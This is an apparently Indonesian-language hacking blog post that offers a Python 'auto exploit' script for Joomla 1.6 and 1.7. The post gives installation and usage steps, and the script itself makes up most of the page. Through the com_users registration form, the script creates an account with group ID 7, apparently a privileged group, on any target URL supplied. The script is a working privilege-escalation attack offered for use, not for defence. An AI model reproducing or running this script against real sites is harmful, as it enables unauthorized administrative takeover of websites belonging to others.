#!/usr/bin/ruby puts

SunDi3yansyah

;
puts

App Server, Database App, Web App

;

Joomla Com_User Auto Exploit With Python

| Comments | Cahyadi Triyansyah Cahyadi Triyansyah

Exploit Joomla version 1.6 & 1.7

Require Install

Who to?

  • Kalian harus install dulu python
  • Kalau sudah install pythonnya lanjut ke install Python Requests, download kemudian ektrak filenya dan jalankan seperti ini (linux):
1
sudo python setup.py install
  • Kemudian simpan script python dibawah ke direktori dimana kalian ingin menyimpannya.
  • Buka terminal (linux) Bash Scripting Python aka CMD (Windows)
  • Masuk ke direktori (cd) dimana script tadi anda simpan.
  • Jalankan sebagai contoh:
1
python sbh.py http://target.com/ usermu passwordmu emailmu

By xSecurity

Modif Sign by SunDi3yansyah | Surabaya Blackhat

sbh.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#!/usr/bin/python
# Joomla Com_User Auto Exploit
# By xSecurity
# Modif Sign by SunDi3yansyah | Surabaya Blackhat

import requests as sec4ever, re, urllib, sys, os
from threading import Thread
from time import sleep
def cls():
  os.system(['clear','cls'][os.name =='nt'])

cls()
print '''
   ____                  _                         ____  _            _    _           _   
  / ___| _   _ _ __ __ _| |__   __ _ _   _  __ _  | __ )| | __ _  ___| | _| |__   __ _| |_ 
  \___ \| | | | '__/ _` | '_ \ / _` | | | |/ _` | |  _ \| |/ _` |/ __| |/ / '_ \ / _` | __|
   ___) | |_| | | | (_| | |_) | (_| | |_| | (_| | | |_) | | (_| | (__|   <| | | | (_| | |_ 
  |____/ \__,_|_|  \__,_|_.__/ \__,_|\__, |\__,_| |____/|_|\__,_|\___|_|\_\_| |_|\__,_|\__|
                                     |___/                                                 
                                              _      _               
                        |  _  _.._._  _|_ _  |_) _  |_) __|__|_ _ ._ 
                        |_(/_(_|| | |  |_(_) |_)(/_ |_)(/_|_ |_(/_| 
        ---------------------------------------------------------------------
Joomla Version [1.6|1.7] [Com_User] Auto Exploit
Require Need Install Requests Python Package (Cari di google)
--------------------------------------------------------------
Surabaya Blackhat | Surabaya Hackerlink | Yogyakarta Blackhat
--------------------------------------------------------------
Please wait...'''

pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
def one(target,pwd1,pwd2,email):
  # Wrong Password
  x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
  token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
  post = {}
  post["jform[name]"] = 'SunDi3yansyah'
  post["jform[username]"] = user
  post["jform[password1]"] = pwd1
  post["jform[password2]"] = pwd2
  post["jform[email1]"] = email
  post["jform[email2]"] = email
  post["jform[groups][]"] = "7"
  post["option"] = "com_users"
  post["task"] = "registration.register"
  post[token[0]] = "1"
  p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')

def exploit(target,pwd1,pwd2,email):
  # Wrong Password
  x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
  token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
  post = {}
  post["jform[name]"] = 'SunDi3yansyah'
  post["jform[username]"] = user
  post["jform[password1]"] = pwd1
  post["jform[password2]"] = pwd1
  post["jform[email1]"] = email
  post["jform[email2]"] = email
  post["jform[groups][]"] = "7"
  post["option"] = "com_users"
  post["task"] = "registration.register"
  post[token[0]] = "1"
  p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')

xsec = sec4ever.session()
if len(sys.argv) == 5:
  target = sys.argv[1]
  user = sys.argv[2]
  pwd1 = sys.argv[3]
  email = sys.argv[4]
  one(target,pwd1,pwd2,email)
  ex = exploit(target,pwd1,pwd2,email)
  print ' * Go To Your Email & Active Then Login \n * Username: '+user+' & Password: '+pwd1
else:
  print "Usage: python sbh.py http://target.com/ usermu passwordmu emailmu"

Screenshot

Video

Comments